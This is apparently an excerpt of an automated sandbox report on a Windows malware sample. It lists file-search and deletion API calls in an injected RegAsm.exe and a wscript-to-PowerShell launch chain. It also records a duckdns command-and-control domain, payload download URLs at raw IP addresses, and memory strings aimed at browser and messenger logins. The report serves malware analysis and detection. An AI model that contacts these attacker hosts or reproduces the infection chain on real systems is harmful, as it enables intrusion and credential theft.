                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407C97

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: maveing.duckdns.org
                    Source: unknownDNS query: name: maveing.duckdns.org
                    Source: screensimplethingstohandlecream.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                    Source: screensimplethingstohandlecream.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/HNBC.txt HTTP/1.1Host: 192.3.176.154Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0041B380
                    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/HNBC.txt HTTP/1.1Host: 192.3.176.154Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: RegAsm.exe, 00000004.00000002.1747223891.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: =2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000004.00000002.1747223891.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: =2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvDE09.tmp.4.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                    Source: bhvDE09.tmp.4.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: maveing.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.154
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.154/50/HNBC.txt
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
                    Source: powershell.exe, 00000001.00000002.1796467839.000001F16A425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg00Bj
                    Source: powershell.exe, 00000001.00000002.1796467839.000001F16A425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg7
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                    Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2929959756.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpP
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR9
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0Q
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://ocspx.digicert.com0E
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F151F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvDE09.tmp.4.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                    Source: RegAsm.exe, 00000004.00000002.1746136572.00000000008F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F151F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                    Source: powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: RegAsm.exe, 00000004.00000002.1747987685.0000000002CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld200
                    Source: RegAsm.exe, 00000004.00000002.1747223891.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
